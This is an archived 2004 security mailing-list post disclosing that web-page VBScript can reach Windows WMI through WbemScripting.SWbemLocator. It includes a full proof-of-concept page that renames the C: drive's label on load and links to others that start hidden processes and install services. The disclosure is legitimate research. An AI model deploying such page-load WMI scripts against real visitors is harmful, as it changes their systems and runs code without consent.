Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: WbemScripting.SWbemLocator - createobject allows... EVERYTHING!

WbemScripting.SWbemLocator - createobject allows... EVERYTHING!

From: Bartosz Kwitkowski <bartosz_at_wb.pl>
Date: 4 Mar 2004 21:24:27 -0000
('binary' encoding is not supported, stored as-is) I would like to dedicate this discovery to Justyna.

WbemScripting.SWbemLocator - this object has access to WMI in Win XP ( i have Prof fully patched). , 2003 , any NT? I think, this vuln concerns all Windows where we can find WbemScripting.SWbemLocator.

I would not like to publish more exploits because of their dangerous use

more examples are at:

http://wb.pl/bartosz/wbem/process.htm - create process in hidden window
http://wb.pl/bartosz/wbem/installservice.htm - installs service
http://wb.pl/bartosz/wbem/changevolume.htm - changes volume of C:

HOME PAGE - http://wb.pl/bartosz/

example source:
<HTML>
<HEAD>
<TITLE>Change volume of disk</TITLE>
&lt;SCRIPT LANGUAGE="VBScript">
   
// I would like to dedicate this discovery to Justyna.

   Sub window_onload
   const impersonation = 3



   Set Locator = CreateObject("WbemScripting.SWbemLocator")
   Set Service = Locator.ConnectServer()
   Service.Security_.ImpersonationLevel=impersonation

   Set Process = Service.Get("Win32_LogicalDisk=""C:""")
 

Process.VolumeName = "bartosz kwitkowski
Process.Put_


end sub

&lt;/SCRIPT&gt;
</HEAD>
<BODY>
I would like to dedicate this discovery to Justyna.
</BODY>
</HTML>


ANY QUESTIONS? ASK ME!
Received on Mar 04 2004
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos